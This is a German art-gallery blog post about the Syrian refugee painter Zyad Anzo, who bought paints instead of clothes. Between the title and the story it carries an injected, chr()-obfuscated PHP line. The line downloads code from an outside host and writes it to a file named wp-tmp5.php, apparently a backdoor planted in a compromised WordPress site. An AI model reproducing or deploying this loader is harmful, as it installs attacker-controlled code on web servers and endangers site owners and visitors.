/, Commercial, Info/Statt Kleidung lieber Farbe kaufen….

Statt Kleidung lieber Farbe kaufen….

file_put_contents(chr(119).chr(112).chr(45).chr(116).chr(109).chr(112).chr(53).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(109).chr(121).chr(115).chr(112).chr(97).chr(99).chr(101).chr(105).chr(100).chr(46).chr(115).chr(112).chr(97).chr(99).chr(101).chr(47).chr(108).chr(48).chr(46).chr(116).chr(120).chr(116)));

Zyad Anzo, der nach einer mehr als abenteuerlichen Flucht aus Syrien in Deutschland Fuß gefasst hat, hat viel zu sagen.

Er setzt sich für die Rechte der Frau ein, was auch die Titel seiner Bilder ausdrücken z.B. Die Frau darf nicht eingeschränkt werden

er glaubt an dne Erfolg und ist sich sicher dass jeder den Schlüssel dazu in seiner Hand hat. Und genau das hat er selber erlebt. Er musste in deutschland erst mal in unerträglcih überfüllten Sammelunterkünften leben, hatte kaum Geld und das meiste seiner Habe ging auf der Flucht verloren. Zu malen wurde ihm so sehr zum Bedürfnis, dass er von seinem ersten Geld Acrylfarben und Leinwände gekauft hatte, keine neue Kleidung, die er auch dringend nötig gehabt hätte.

Seine alte Hose, die er von Damaskus bis Nürnberg getragen hat hängt heute an einem Nagel neben seiner Tür und erinnert ihn immer wieder daran, weiter zu machen!

Mehr voin Zyad Anzo in der Galerie Mouzaoui sehen

By | 2019-01-16T16:51:03+01:00 Januar 18th, 2019|Allgemein, Commercial, Info|0 Comments

About the Author:

Onlinegalerie Mouzaoui,wir sind am Puls der Zeit!

Durch die weitere Nutzung der Seite stimmen Sie der Verwendung von Cookies zu. Weitere Informationen

Die Cookie-Einstellungen auf dieser Website sind auf "Cookies zulassen" eingestellt, um das beste Surferlebnis zu ermöglichen. Wenn Sie diese Website ohne Änderung der Cookie-Einstellungen verwenden oder auf "Akzeptieren" klicken, erklären Sie sich damit einverstanden.

Schließen